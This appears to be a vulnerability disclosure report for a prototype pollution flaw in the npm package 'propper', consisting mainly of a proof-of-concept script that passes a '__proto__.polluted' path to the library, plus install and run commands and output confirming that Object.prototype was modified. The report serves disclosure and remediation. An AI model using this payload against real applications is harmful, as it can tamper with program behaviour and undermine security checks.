Prototype Pollution in allain/propper

Valid

Reported on

Feb 13th 2021


Description

Prototype Pollution in propper

Proof of Concept

  1. Create the following PoC file:
// poc.js
var propper = require("propper")
var obj = {}
console.log("Before : " + {}.polluted);
propper(obj,"__proto__.polluted","Yes! Its Polluted");
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i propper # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation